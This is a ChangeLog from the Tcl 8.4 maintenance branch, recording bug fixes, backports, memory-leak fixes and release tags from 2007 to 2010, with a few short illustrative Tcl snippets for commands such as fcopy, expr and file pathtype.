2010-09-01 Andreas Kupries <[email protected]> * generic/tclExecute.c: [Bug 3057639]. Applied patch by Jeff to * generic/tclVar.c: make the behaviour of lappend in bytecompiled * tests/append.test: mode consistent with direct-eval and 'append' * tests/appendComp.test: generally. Added tests (append*-9.*) showing the difference. 2010-07-25 Jan Nijtmans <[email protected]> * generic/tclInt.h: [Bug 3030870] make itcl 3.x built with pre-8.6 * generic/tclBasic.c: work in 8.6 revert tclInt.h to what it was before, and relax the relation between Tcl_CallFrame and CallFrame. 2010-07-18 Jan Nijtmans <[email protected]> * generic/tcl.h: [Bug 3031278] fixed merge problem in previous commit. 2010-07-17 Jan Nijtmans <[email protected]> * generic/tcl.h: [Bug 3030870] make itcl 3.x built with pre-8.6 * generic/tclInt.h: work in 8.6 2010-07-16 Jan Nijtmans <[email protected]> * generic/tcl.h: (Backport) take over definitions of _WIN32, DLLIMPORT, DLLEXPORT and TCL_LL_MODIFIER macros from Tcl8.5/8.6 2010-06-28 Jan Nijtmans <[email protected]> * generic/tclPosixStr.c: [Bug 3019634] errno.h and tclWinPort.h have conflicting definitions. 2010-06-09 Andreas Kupries <[email protected]> * library/platform/platform.tcl: Added OSX Intel 64bit * library/platform/pkgIndex.tcl: Package updated to version 1.0.9. 2010-05-07 Andreas Kupries <[email protected]> * library/platform/platform.tcl: Fix cpu name for Solaris/Intel 64bit. * library/platform/pkgIndex.tcl: Package updated to version 1.0.8. 2010-04-29 Andreas Kupries <[email protected]> * library/platform/platform.tcl: Another stab at getting the /lib, * library/platform/pkgIndex.tcl: /lib64 difference right for linux. Package updated to version 1.0.7. 2010-04-18 Donal K. Fellows <[email protected]> * doc/unset.n: [Bug 2988940]: Fix typo. 2010-04-14 Andreas Kupries <[email protected]> * library/platform/platform.tcl: Linux platform identification: * library/platform/pkgIndex.tcl: Check /lib64 for existence of files matching libc* before accepting it as base directory. This can happen on weirdly installed 32bit systems which have an empty or partially filled /lib64 without an actual libc. Bumped to version 1.0.6. 2010-04-06 Zoran Vasiljevic <[email protected]> * generic/tclCmdMZ.c (Tcl_RegexpObjCmd): fixed object leak. 2010-04-02 Zoran Vasiljevic <[email protected]> * generic/tclStringObj.c: (SetStringFromAny): avoid trampling over the tclEmptyStringRep->bytes as it is thread-shared (thx to Gustaf Neumann for the (hard) work of locating this one). 2010-03-01 Alexandre Ferrieux <[email protected]> * unix/tclUnixChan.c: [backported] Refrain from a possibly lengthy reverse-DNS lookup on 0.0.0.0 when calling [fconfigure -sockname] on a universally-bound (default) server socket. 2010-02-22 Jan Nijtmans <[email protected]> * generic/tclExecute.c: Fix [Bug 2954959] expr abs(-0.0) is -0.0 * tests/expr.test: Added some test cases, backported from 8.5 2010-02-11 Andreas Kupries <[email protected]> * generic/tclCompile.c: [Bug 2949302]: Fixed leak of support structures for [info frame] which occurred when bytecode compilation fails. 2010-02-01 Donal K. Fellows <[email protected]> * generic/regexec.c (ccondissect, crevdissect): [Bug 2942697]: Rework these functions so that certain pathological patterns are matched much more rapidly. Many thanks to Tom Lane for diagnosing this issue and providing an initial patch. 
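A hedged illustration of the 2010-02-22 expr entry above; the transcript is a sketch of the intended post-fix behaviour, not output from the actual test suite:

    % expr {abs(-0.0)}
    0.0          ;# an unpatched 8.4 core reported -0.0 here [Bug 2954959]
    % expr {abs(-1.5)}
    1.5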
2009-11-16 Alexandre Ferrieux <[email protected]> * generic/tclEncoding.c: (Backport) Fix [Bug 2891556] and improve * tests/encoding.test: test to detect similar manifestations in the future. 2009-11-12 Andreas Kupries <[email protected]> * generic/tclIO.c (CopyData): [Bug 2895565]. Dropped bogosity * tests/io.test: which used the number of _written_ bytes or characters to update the counters for the read bytes/characters. New test io-53.11. This is a backward port from the 8.5 branch. 2009-11-10 Pat Thoyts <[email protected]> * tests/fCmd.test: Fixed a number of issues for Vista * tests/registry.test: and Win7 that are due to restricted * tests/tcltest.test: permissions under UAC. * tests/winFCmd.test: 2009-11-10 Stuart Cassoff <[email protected]> * win/README: [bug 2459744]: Removed outdated Msys + Mingw info. 2009-11-10 Andreas Kupries <[email protected]> * generic/tclObj.c: Plug memory leak in TclContinuationsEnter(). [Bug 2895323]. Backport from Tcl 8.5 branch, change by Don Porter. 2009-11-09 Andreas Kupries <[email protected]> * generic/tclBasic.c (TclEvalObjEx): Moved the #280 decrement of refCount for the file path out of the branch after the whole conditional, closing a memory leak. Added clause on structure type to prevent segfaulting. Backport from valgrinding the Tcl 8.5 branch. * tests/info.test: Resolve ambiguous resolution of variable "res". Backport from 8.5 2009-10-23 Andreas Kupries <[email protected]> * generic/tclCompCmds.c: [Bug 2881263] (TclCompileForeachCmd, TclCompileLindexCmd): Fixed. Moved the use of DefineLineInformation after all regular variable declarations, so that an empty statement (-UTIP_280) doesn't confuse c89 compilers. * library/platform/pkgIndex.tcl: Backported the platform packages * library/platform/platform.tcl: from head and 8.5 into the 8.4 * library/platform/shell.tcl: branch. Updated makefiles to install * unix/Makefile.in: the packages. * win/Makefile.in: * generic/tclIO.c (FlushChannel): Skip OutputProc for low-level 0-length writes. When closing pipes which have already been closed, not skipping leads to spurious SIGPIPE signals. Reported by Mikhail Teterin <[email protected]>. 2009-10-21 Donal K. Fellows <[email protected]> * generic/tclPosixStr.c: [Bug 2882561]: Work around oddity on Haiku OS where SIGSEGV and SIGBUS are the same value. 2009-10-18 Joe Mistachkin <[email protected]> 2009-10-04 Daniel Steffen <[email protected]> * macosx/tclMacOSXBundle.c: Workaround CF memory management bug in * unix/tclUnixInit.c: Mac OS X 10.4 & earlier. [Bug 2569449] 2009-09-28 Don Porter <[email protected]> * generic/tclAlloc.c: Cleaned up various routines in the * generic/tclCkalloc.c: call stacks for memory allocation to * generic/tclParse.c: guarantee that any size values computed * generic/tclThreadAlloc.c: are within the domains of the routines they get passed to. [Bugs 2557696 and 2557796]. 2009-09-18 Don Porter <[email protected]> * generic/tclCmdMZ.c (Tcl_SubstObj): Pass 'length' values to recursive parsing calls to convert O(N^2) operations of [subst] to O(N). 
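A hedged sketch relating to the 2009-11-12 fcopy entry above: the completion callback receives the number of bytes actually copied, which is the counter the CopyData fix concerns; the file names and callback name here are made up.

    proc copyDone {bytes args} {
        # $bytes is the copied-byte count; an optional second argument
        # carries an error message if the copy failed.
        puts "copied $bytes bytes"
        if {[llength $args]} { puts "error: [lindex $args 0]" }
        set ::done 1
    }
    set in  [open input.dat r]
    set out [open output.dat w]
    fconfigure $in  -translation binary
    fconfigure $out -translation binary
    fcopy $in $out -command copyDone    ;# background copy; callback fires when finished
    vwait ::done
    close $in
    close $out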
2009-08-25 Andreas Kupries <[email protected]> * generic/tclBasic.c (Tcl_CreateInterp, Tcl_EvalTokensStandard, (EvalTokensStandard, Tcl_EvalEx, EvalEx, TclAdvanceContinuations, (TclEvalObjEx): * generic/tclCmdMZ.c (Tcl_SwitchObjCmd, ListLines): * generic/tclCompCmds.c (*): * generic/tclCompile.c (TclSetByteCodeFromAny, TclInitCompileEnv, (TclFreeCompileEnv, TclCompileScript): *ContinuationsGet, TclFreeObj): * generic/tclProc.c (TclCreateProc): * generic/tclVar.c (TclPtrSetVar): * tests/info.test (info-30.0-22): Extended parser, compiler, and execution with code and attendant data structures tracking the positions of continuation lines which are not visible in script's, to properly account for them while counting lines for #280, during direct and compiled execution. 2009-08-17 Don Porter <[email protected]> * generic/tclFileName.c: Correct result from [glob */test] when * * tests/fileName.test: matches something like ~foo. [Bug 2837800] 2009-07-23 Joe Mistachkin <[email protected]> * generic/tclNotify.c: Fix for [Bug 2820349]. 2009-07-14 Andreas Kupries <[email protected]> * generic/tclBasic.c (DeleteInterpProc,TclArgumentBCEnter, (TclArgumentBCRelease, TclArgumentGet): * generic/tclCompile.c (EnterCmdWordIndex, TclCleanupByteCode, (TclInitCompileEnv, TclCompileScript): * generic/tclCompile.h (ExtCmdLoc): * generic/tclExecute.c (TclExecuteByteCode): * generic/tclInt.h (ExtIndex, CFWordBC): * tests/info.test (info-39.0): Backport of some changes made to the Tcl head, to handle literal sharing better. The code here is much simpler (trimmed down) compared to the head as the 8.4 branch is not bytecode compiling whole files, and doesn't compile eval'd code either. Reworked the handling of literal command arguments in bytecode to be saved (compiler) and used (execution) per command (See the TCL_INVOKE_STK* instructions), and not per the whole bytecode. This removes the problems with location data caused by literal sharing in proc bodies. Simplified the associated datastructures (ExtIndex is gone, as is the function EnterCmdWordIndex). 2009-06-13 Don Porter <[email protected]> * generic/tclCompile.c: The value stashed in iPtr->compiledProcPtr * generic/tclProc.c: when compiling a proc survives too long. We * tests/execute.test:. [Bug 2802881]. 2009-04-28 Jeff Hobbs <[email protected]> * unix/tcl.m4, unix/configure (SC_CONFIG_CFLAGS): harden the check to add _r to CC on AIX with threads. 2009-04-27 Alexandre Ferrieux <[email protected]> * generic/tclInt.h: Backport fix for [Bug 1028264]: WSACleanup() too * generic/tclEvent.c: early. The fix introduces "late exit handlers" * win/tclWinSock.c: for similar late process-wide cleanups. 2009-04-27 Alexandre Ferrieux <[email protected]> * win/tclWinSock.c: Backport fix for [Bug 2446662]: resync Win behavior on RST with that of unix (EOF). 2009-04-22 Andreas Kupries <[email protected]> * generic/tclStringObj.c (UpdateStringOfString): Added cast to fix signed/unsigned mismatch breaking win32 symbol/debug build. 2009-04-15 Don Porter <[email protected]> * generic/tclStringObj.c: AppendUnicodeToUnicodeRep failed to set stringPtr->allocated to 0, leading to crashes. 2009-04-14 Stuart Cassoff <[email protected]> * unix/tcl.m4: Removed -Wno-implicit-int from CFLAGS_WARNING. 2009-04-08 Don Porter <[email protected]> * library/tcltest/tcltest.tcl: Fixed unsafe [eval]s in the tcltest * library/tcltest/pkgIndex.tcl: package. 
[Bug 2570363] 2009-04-07 Don Porter <[email protected]> * generic/tclStringObj.c: Completed backports of fixes for [Bug 2494093] and [Bug 2553906]. 2009-03-30 Don Porter <[email protected]> * doc/Alloc.3: Size argument is "unsigned int". [Bug 2556263] * generic/tclStringObj.c: Added protections from invalid memory * generic/tclTestObj.c: accesses when we append (some part of) * tests/stringObj.test: a Tcl_Obj to itself. Added the appendself and appendself2 subcommands to the [teststringobj] testing command and added tests to the test suite. [Bug 2603158] 2009-03-27 Don Porter <[email protected]> * tests/fileName.test: Tests for [Bug 2710920] to guard against its appearance. 2009-03-20 Don Porter <[email protected]> * generic/tclStringObj.c: Test stringObj-6.9 checks that * tests/stringObj.test: Tcl_AppendStringsToObj() no longer crashes when operating on a pure unicode value. [Bug 2597185] * generic/tclExecute.c (INST_CONCAT1): Panic when appends overflow the max length of a Tcl value. [Bug 2669109] 2009-03-18 Don Porter <[email protected]> * win/tclWinFile.c (TclpObjNormalizePath): Corrected Tcl_Obj leak. Thanks to Joe Mistachkin for detection and patch. [Bug 2688184]. 2009-02-20 Don Porter <[email protected]> * generic/tclPathObj.c: Fixed mistaken logic in TclFSGetPathType() * tests/fileName.test: that assumed (not "absolute" => "relative"). This is a false assumption on Windows, where "volumerelative" is another possibility. [Bug 2571597]. 2008-02-06 Daniel Steffen <[email protected]> * generic/tcl.h (Darwin): workaround conflict between deprecated tcl panic macro and panic() function declaration in <mach/mach.h> header. 2009-02-05 Don Porter <[email protected]> * generic/tclStringObj.c: Added overflow protections to the AppendUtfToUtfRep routine to either avoid invalid arguments and crashes, or to replace them with controlled panics. [Bug 2561794] 2009-02-04 Don Porter <[email protected]> * generic/tclStringObj.c (SetUnicodeObj): Corrected failure of Tcl_SetUnicodeObj() to panic on a shared object. [Bug 2561488]. Also factored out common code to reduce duplication. 2009-01-09 Don Porter <[email protected]> * generic/tclStringObj.c (STRING_SIZE): Corrected failure to limit memory allocation requests to the sizes that can be supported by Tcl's memory allocation routines. [Bug 2494093]. 2009-01-08 Don Porter <[email protected]> * generic/tclStringObj.c (STRING_UALLOC): Added missing parens required to get correct results out of things like STRING_UALLOC(num + append). [Bug 2494093]. 2008-12-04 Don Porter <[email protected]> * generic/tclIOUtil.c (Tcl_FSGetNormalizedPath): Added another flag value TCLPATH_NEEDNORM to mark those intreps which need more complete normalization attention for correct results. [Bug 2385549] 2008-12-03 Don Porter <[email protected]> * generic/tclFileName.c (TclDoGlob): One of the Tcl_FSMatchInDirectory() calls did not have its return code checked. Some VFS drivers can return TCL_ERROR, and when that's not checked, the error message gets converted into a list of matching files returned by [glob], with ridiculous results. 2008-12-01 Don Porter <[email protected]> * generic/tclIO.c (TclFinalizeIOSubsystem): Revised latest commit to something that doesn't crash the test suite. 2008-11-25 Andreas Kupries <[email protected]> * generic/tclIO.c (TclFinalizeIOSubsystem): Applied backport of Alexandre Ferrieux's patch for [Bug 2270477] to prevent infinite looping during finalization of channels not bound to interpreters. 
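A minimal sketch of the introspection fed by the 2009-08-25 TIP #280 work above, assuming an 8.4 core built with the TIP 280 feature enabled so that [info frame] is available; the proc name is invented.

    proc where {} {
        # [info frame] with no argument gives the stack depth; asking for
        # depth-1 describes the caller's frame as a key/value list.
        array set f [info frame [expr {[info frame] - 1}]]
        return "$f(type) line $f(line)"
    }
    puts [where]    ;# e.g. "source line 42" when called from a sourced script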
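A sketch for the 2009-02-20 TclFSGetPathType entry above; the results assume a Windows build, where "volumerelative" is the third classification besides absolute and relative.

    file pathtype C:/Tcl       ;# absolute
    file pathtype lib/tcl8.4   ;# relative
    file pathtype /Tcl         ;# volumerelative (absolute path, no drive letter)
    file pathtype C:Tcl        ;# volumerelative (drive letter, relative path)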
2008-11-23 Andreas Kupries <[email protected]> * generic/tclIO.c: Backport of fix for [Bug 2333466]. 2008-11-04 Jeff Hobbs <[email protected]> * generic/tclPort.h: remove the ../{win,unix}/ header dirs as the build system already has it, and it confuses builds when used with private headers installed. 2008-09-25 Don Porter <[email protected]> * doc/global.n: Correct false claim about [info locals]. 2008-08-14 Don Porter <[email protected]> * tests/fileName.test: Revise new tests for portability to case insensitive filesystems. 2008-08-14 Daniel Steffen <[email protected]> * generic/tclCompile.h: add support for debug logging of DTrace * generic/tclBasic.c: 'proc', 'cmd' and 'inst' probes (does _not_ require a platform with DTrace). * unix/Makefile.in: ensure Makefile shell is /bin/bash for * unix/configure.in (SunOS): DTrace-enabled build on Solaris. (followup to 2008-06-12) [Bug 2016584] * unix/tcl.m4 (SC_PATH_X): check for libX11.dylib in addition to libX11.so et al. * unix/configure: autoconf-2.13 2008-08-13 Don Porter <[email protected]> * generic/tclFileName.c: Fix for errors handling -types {} * tests/fileName.test: option to [glob]. [Bug 1750300] Thanks to Matthias Kraft and George Peter Staplin. 2008-08-11 Andreas Kupries <[email protected]> * generic/tclProc.c (Tcl_ProcObjCmd): Fixed memory leak triggered * tests/proc.test: by procbody::test::proc. See [Bug 2043636]. Added a test case demonstrating the leak before the fix. Fixed a few spelling errors in test descriptions as well. 2008-07-28 Andreas Kupries <[email protected]> * generic/tclBasic.c: Added missing release of extended command word index when deleting an interpreter (DeleteInterpProc). Added missing ref count when creating an empty string as path (EvalEx). * generic/tclCompile.c (TclInitCompileEnv): Made same change to control flow as in TclEvalObjEx. Not needed while uplevel and siblings go through the eval-direct code path, however if that changes (like it did in 8.5+) better to have this in place instead of re-searching why certain places are without absolute locations. * tests/info.test: Added tests 38.*, exactly testing the tracking of location for uplevel scripts, and made the testsuite fully usable with and without -singleproc 1. 2008-07-25 Daniel Steffen <[email protected]> * tests/info.test: Add !singleTestInterp constraint to various tests; (info-22.8, info-23.0): switch to glob matching to avoid sensitivity to tcltest.tcl line number changes. [Bug 1605269] 2008-07-24 Andreas Kupries <[email protected]> * tests/info.test: Tests 38.* added, exactly testing the tracking of location for uplevel scripts. 2008-07-23 Andreas Kupries <[email protected]> * generic/tclBasic.c: Modified TclArgumentGet to reject pure lists * generic/tclCmdIL.c: immediately, without search. Reworked setup * generic/tclCompile.c: of eoFramePtr, doesn't need the line * tests/info.test: information, more sensible to have everything on line 1 when eval'ing a pure list. Updated the users of the line information to special case this based on the frame type (i.e. TCL_LOCATION_EVAL_LIST). Added a testcase demonstrating the new behaviour. 2008-07-22 Andreas Kupries <[email protected]> * generic/tclBasic.c: Added missing function comments. * generic/tclCompile.c: Made the new TclEnterCmdWordIndex * generic/tclCompile.h: static. 
* generic/tclBasic.c: Reworked the handling of bytecode literals * generic/tclCompile.c: for #280 to fix the abysmal performance * generic/tclCompile.h: for deep recursion, replaced the linear * generic/tclExecute.c: search through the whole stack with * generic/tclInt.h: another hashtable and simplified the data structure used by the compiler (array instead of hashtable). Incidentially this also fixes the memory leak reported via [Bug 2024937]. 2008-07-21 Andreas Kupries <[email protected]> * generic/tclBasic.c: Extended the existing TIP #280 system (info * generic/tclCmdAH.c: frame), added the ability to track the * generic/tclCompCmds.c: absolute location of literal procedure * generic/tclCompile.c: arguments, and making this information * generic/tclCompile.h: available to uplevel, eval, and * generic/tclInterp.c: siblings. This allows proper tracking of * generic/tclInt.h: absolute location through custom (Tcl-coded) * generic/tclNamesp.c: control structures based on uplevel, etc. * generic/tclProc.c: 2008-07-07 Andreas Kupries <[email protected]> * generic/tclCmdIL.c (InfoFrameCmd): Fixed unsafe idiom of setting the interp result found by Don Porter. 2008-07-04 Joe English <[email protected]> * generic/tclEncoding.c(UtfToUtfProc): Avoid unwanted sign extension when converting incomplete UTF-8 sequences. See [Bug 1908443] for details. 2008-07-03 Don Porter <[email protected]> * library/package.tcl: Removed [file readable] testing from [tclPkgUnknown] and friends. We find out soon enough whether a file is readable when we try to [source] it, and not testing before allows us to workaround the bugs on some common filesystems where [file readable] lies to us. [Patch 1969717] 2008-06-28 Don Porter <[email protected]> * generic/tclIOUtil.c: Plug memory leak in latest commit. Thanks Rolf Ade for detecting and Dan Steffen for the fix [Bug 2004654]. 2008-06-23 Don Porter <[email protected]> * generic/tclIOUtil.c: Fixed bug in Tcl_GetTranslatedPath() when operating on the "Special path" variant of the "path" Tcl_ObjType intrep. A full normalization was getting done, in particular, coercing relative paths to absolute, contrary to what the function of producing the "translated path" is supposed to do. [Bug 1972879]. 2008-06-20 Don Porter <[email protected]> * tests/binary.test: Corrected flawed tests revealed by a -debug 1 * tests/io.test: -singleproc 1 test suite run. 2008-06-18 Don Porter <[email protected]> * generic/tclParseExpr.c: Disabled attempts to support [expr] functions named eq(...) or ne(...). Any attempts to use such functions were panicking. [Bug 1971879]. 2008-06-16 Andreas Kupries <[email protected]> * generic/tclCmdIL.c (InfoFrameCmd): Backport of fix made on the * tests/info.test: head branch :: Moved the code looking up the information for key 'proc' out of the TCL_LOCATION_BC branch to after the switch, this is common to all frame types. Updated the testsuite to match. This was exposed by the 2008-06-08 commit (Miguel), switching uplevel from direct eval to compilation. Fixes [Bug 1987851]. 2008-06-12 Andreas Kupries <[email protected]> * generic/tclCmdIL.c (InfoFrameCmd): TIP #280 conditional feature. Added checks to validate HashEntry and HashTable information gotten from Command structures. This seems to be needed to handle structures managed by Itcl. 2008-06-12 Daniel Steffen <[email protected]> * unix/Makefile.in: add complete deps on tclDTrace.h. * unix/Makefile.in: clean generated tclDTrace.h file. * unix/configure.in (SunOS): fix static DTrace-enabled build. 
* unix/tcl.m4 (SunOS-5.11): fix 64bit amd64 support with gcc & Sun cc. * unix/configure: autoconf-2.13 2008-05-26 Jeff Hobbs <[email protected]> * tests/io.test (io-53.9): need to close chan before removing file. 2008-05-23 Andreas Kupries <[email protected]> * win/tclWinChan.c (FileWideSeekProc): Accepted a patch by Alexandre Ferrieux <[email protected]> to fix the [Bug 1965787]. 'tell' now works for locations > 2 GB as well instead of going negative. * generic/tclIO.c (Tcl_SetChannelBufferSize): Accepted a patch by * tests/io.test: Alexandre Ferrieux <[email protected]> to fix the [Bug 1969953]. Buffer sizes outside of the supported range are now clipped to the nearest boundary instead of ignored. 2008-04-26 Zoran Vasiljevic <[email protected]> * generic/tclAsync.c: Tcl_AsyncDelete(): panic if attempt to locate handler token fails. Happens when some other thread attempts to delete somebody else's token. Also, panic early if we find out the wrong thread attempting to delete the async handler (common trap), as only the one that created the handler is allowed to delete it. 2008-04-17 Andreas Kupries <[email protected]> *** 8.4.19 TAGGED FOR RELEASE *** * generic/tclCompExpr.c (CompileMathFuncCall): Added * tests/compExpr.test (compExpr-5.10): Tcl_ResetResult before appending error message, to clear out possible sharing. Added test case demonstrating the crash (abort on shared object) without the fix. 2008-04-15 Andreas Kupries <[email protected]> * generic/tclIO.c (CopyData): Applied another patch by Alexandre * io.test (io-53.8a): Ferrieux <[email protected]>, to shift EOF handling to the async part of the command if a callback is specified, should the channel be at EOF already when fcopy is called. Testcase by myself. 2008-04-14 Kevin B. Kenny <[email protected]> * unix/tclUnixTime.c (TclpGetClicks, Tcl_GetTime): Removed obsolete use of 'struct timezone' in the call to 'gettimeofday'. [Bug 1942197]. 2008-04-14 Don Porter <[email protected]> * generic/tclExecute.c: Plug memory leak introduced in the 2008-03-07 commit. [Bug 1940433] 2008-04-11 Don Porter <[email protected]> * README: Bump version number to 8.4.19 * generic/tcl.h: * tools/tcl.wse.in: * unix/configure.in: * unix/tcl.spec: * win/README.binary: * win/configure.in: * unix/configure: autoconf-2.13 * win/configure: * changes: updates for 8.4.19 release. 2008-04-10 Andreas Kupries <[email protected]> * generic/tclIOCmd.c (Tcl_FcopyObjCmd): Keeping check for negative values, changed to not be an error, but behave like the special value -1 (copy all, default). * tests/iocmd.test (iocmd-15.{12,13}): Removed. * tests/io.test (io-52.5{,a,b}): Reverted last change, added comment regarding the meaning of -1, added two more testcases for other negative values, and input wrapped to negative. 2008-04-09 Andreas Kupries <[email protected]> * tests/io.test (io-52.5): Removed '-size -1' from test, does not seem to have any bearing, and was an illegal value. Test case is not affected by the value of -size, test flag restoration and that everything was properly copied. * generic/tclIOCmd.c (Tcl_FcopyObjCmd): Added checking of -size * tests/ioCmd.test (iocmd-15.{13,14}): value to reject negative values, and values overflowing 32-bit signed. [Bug 1557855]. Basic patch by Alexandre Ferrieux <[email protected]>, with modifications from me to separate overflow from true negative value. Extended testsuite. 2008-04-08 Andreas Kupries <[email protected]> * tests/io.test (io-53.8,53.9,53.10): Backported das' fix of typo and quoting for spaces in builddir path. 
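A hedged sketch for the 2008-05-23 and 2008-04-10 entries above: out-of-range -buffersize values are clipped rather than ignored, and a negative -size behaves like -1 (copy everything); the file names are hypothetical.

    set in  [open source.bin r]
    set out [open dest.bin w]
    fconfigure $in  -translation binary -buffersize 999999999  ;# clipped to the supported maximum
    fconfigure $out -translation binary
    fcopy $in $out -size -1    ;# same as omitting -size: copy until EOF
    close $in
    close $out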
2008-04-07 Andreas Kupries <[email protected]> * tests/io.test (io-53.10): Testcase for bi-directionaly fcopy. * generic/tclIO.c: Additional changes to data structures for fcopy * generic/tclIO.h: and channels to perform proper cleanup in case of a channel having two background copy operations running as is now possible. * generic/tclIO.c (BUSY_STATE, CheckChannelErrors, TclCopyChannel): New macro, and the places using it. This change allows for bi-directional fcopy on channels. [Bug 1350564]. Thanks to Alexandre Ferrieux <[email protected]> for the patch. * tests/io.test (io-53.9): Made test cleanup robust against the possibility of slow process shutdown on Windows. Backported from Kevin Kenny's change to the same test on the 8.5 and head branches. 2008-04-04 Andreas Kupries <[email protected]> * tests/io.test (io-53.9): Added testcase for [Bug 780533], based on Alexandre's test script. Also fixed problem with timer in preceding test, was not canceled properly in the ok case. 2008-04-03 Andreas Kupries <[email protected]> * generic/tclIO.c (CopyData): Applied patch [Bug 1932639] to * tests/io.test: prevent fcopy from calling -command synchronously the first time. Thanks to Alexandre Ferrieux <[email protected]> for report and patch. 2008-04-02 Andreas Kupries <[email protected]> * generic/tclIO.c (CopyData): Applied patch for the fcopy problem [Bug 780533], with many thanks to Alexandre Ferrieux <[email protected]> for tracking it down and providing a solution. Still have to convert his test script into a proper test case. 2008-03-27 Daniel Steffen <[email protected]> * unix/tcl.m4 (SunOS-5.1x): fix 64bit support for Sun cc. [Bug 1921166] * unix/dltest/Makefile.in: support use of LDFLAGS in SHLIB_LD. * unix/configure: autoconf-2.13 2008-03-24 Pat Thoyts <[email protected]> * generic/tclBinary.c: bug #1923966 - crash in binary format * tests/binary.test: Added tests for the above crash condition. 2008-03-11 Daniel Steffen <[email protected]> * macosx/tclMacOSXNotify.c: avoid using CoreFoundation after fork() on Darwin 9 even when TclpCreateProcess() uses vfork(). 2008-03-07 Don Porter <[email protected]> * generic/tclExecute.c (Tcl_ExprObj): Revised expression bytecode compiling so that bytecodes invalid due to changing context or due to the difference between expressions and scripts are not reused. [Bug 1899164]. * generic/tclTest.c: Backport the [testexprlongobj] testing command. * tests/execute.test (execute-6.8): Added tests checking that bytecode is invalidates in the right situations. 2008-03-03 Reinhard Max <[email protected]> * unix/tclUnixChan.c: Fix mark and space parity on Linux, which uses CMSPAR instead of PAREXT. 2008-02-27 Pat Thoyts <[email protected]> * library/http/pkgIndex.tcl: Backported 2.5.5 changes from * library/http/http.tcl: 8.5 version. * doc/http.n: Document the meta accessor. 2008-02-26 Jeff Hobbs <[email protected]> * generic/tclIOCmd.c (Tcl_GetsObjCmd): do not reuse resultObj as it may be shared (crash condition). 2008-02-22 Pat Thoyts <[email protected]> * library/http/pkgIndex.tcl: Set version 2.5.4 * library/http/http.tcl: Fix for bug #1818565. Always check that the state array exists in the http::status command. 2008-02-06 Don Porter <[email protected]> *** 8.4.18 TAGGED FOR RELEASE *** * README: Bump version number to 8.4.18 * generic/tcl.h: * tools/tcl.wse.in: * unix/configure.in: * unix/tcl.spec: * win/README.binary: * win/configure.in: * unix/configure: autoconf-2.13 * win/configure: * changes: updates for 8.4.18 release. 
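A hedged sketch of the bi-directional fcopy scenario enabled by the 2008-04-07 changes above: two background copies over the same channel pair at once; the host, port and callback name are made up.

    proc relayDone {dir bytes args} {
        puts stderr "$dir direction finished after $bytes bytes"
    }
    set sock [socket remote.example.com 9999]
    fconfigure $sock  -translation binary -blocking 0
    fconfigure stdin  -translation binary -blocking 0
    fconfigure stdout -translation binary -blocking 0
    fcopy stdin $sock  -command [list relayDone outbound]   ;# background copy #1
    fcopy $sock stdout -command [list relayDone inbound]    ;# background copy #2
    vwait forever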
2008-02-02 Daniel Steffen <[email protected]> * unix/configure.in (Darwin): correct Info.plist year substitution in non-framework builds. * unix/configure: autoconf-2.13 2008-01-30 Miguel Sofer <[email protected]> * generic/tclInterp.c (Tcl_GetAlias): fix for [Bug 1882373] 2008-01-13 Jeff Hobbs <[email protected]> * win/tclWinSerial.c (SerialCloseProc, TclWinOpenSerialChannel): use critical section for read & write side. [Bug 1353846] (newman) 2007-12-31 Don Porter <[email protected]> *** 8.4.17 TAGGED FOR RELEASE *** * changes: updates for 8.4.17 release. * doc/filename.n: Typo 2007-12-18 Donal K. Fellows <[email protected]> * generic/regguts.h, generic/regc_color.c, generic/regc_nfa.c: Fixes for problems created when processing regular expressions that generate very large automata. An enormous number of thanks to Will Drewry <[email protected]>, Tavis Ormandy <[email protected]>, and Tom Lane <[email protected]> from the Postgresql crowd for their help in tracking these problems down. [Bug 1810264] 2007-12-14 Jeff Hobbs <[email protected]> * win/README: updated notes 2007-12-14 Zoran Vasiljevic <[email protected]> * unix/tclUnixCompat.c (TclpGetHostByName): Really applied the change noted on 2007-11-13 by dkf below. 2007-12-13 Jeff Hobbs <[email protected]> * generic/tclIOUtil.c (TclGetOpenMode): Only set the O_APPEND flag * tests/ioUtil.test (ioUtil-4.1): on a channel for the 'a' mode and not for 'a+'. [Bug 1773127] (backport from HEAD) 2007-12-05 Donal K. Fellows <[email protected]> * generic/tclCmdIL.c (Tcl_LsearchObjCmd): Prevent shimmering crash when -exact and -integer/-real are mixed. [Bug 1844789] 2007-11-28 Jeff Hobbs <[email protected]> * win/tclWinSock.c (Tcl_GetHostName): update to previous fix to set hostname length appropriately, clean up check overall. 2007-11-27 Don Porter <[email protected]> * win/tclWinSock.c: Add missing encoding conversion of the [info hostname] value from the system encoding to Tcl's internal encoding. This is important now that ICANN no longer limits host names to ASCII. [Bug 1823552] 2007-11-26 Zoran Vasiljevic <[email protected]> * generic/tclThread.c: Back-port locking changes from Tcl8.5 in Tcl_Mutex/ConditionFinlize. Now we properly master-lock the finalization of sync primitives. 2007-11-15 Don Porter <[email protected]> * generic/regc_nfa.c: Fixed infinite loop in the regexp compiler * generic/regcomp.c: [Bug 1810038]. Corrected looping logic in * tests/regexp.test: fixempties() to avoid wasting time walking a list of dead states [Bug 1832612]. Convert optst() from expensive no-op to a cheap no-op. Improve newline usage in debug output. 2007-11-13 Donal K. Fellows <[email protected]> * unix/tclUnixCompat.c (TclpGetHostByName): The six-argument form of getaddressbyname_r() uses the fifth argument to indicate whether the lookup succeeded or not on at least one platform. [Bug 1618235] 2007-10-30 Donal K. Fellows <[email protected]> * generic/regc_lex.c (lexescape): Ensure that backreference numbers can't overflow a signed int in a way that breaks things. [Bug 1810264] 2007-10-15 Miguel Sofer <[email protected]> * generic/tclParse.c (Tcl_ParseBraces): fix for possible read after the end of buffer, [Bug 1813528] (Joe Mistachkin). 2007-10-03 Miguel Sofer <[email protected]> * generic/tclObj.c (Tcl_FindCommandFromObj): fix finding a deleted command; cannot trigger this from Tcl itself, but crash reported on xotcl. This check is new to 8.4 but exists in 8.5, so this is a backport or something. Thanks Gustaf Neumann. 
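A sketch for the 2007-12-13 TclGetOpenMode entry above: only mode "a" forces every write to the end of the file (O_APPEND), while "a+" merely starts positioned at EOF and honours later seeks; the file name is made up.

    set f [open log.txt a]     ;# O_APPEND: writes always go to the end
    puts $f "appended line"
    close $f

    set g [open log.txt a+]    ;# starts at EOF, but [seek] works normally
    seek $g 0
    puts -nonewline $g "X"     ;# overwrites the first character
    close $g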
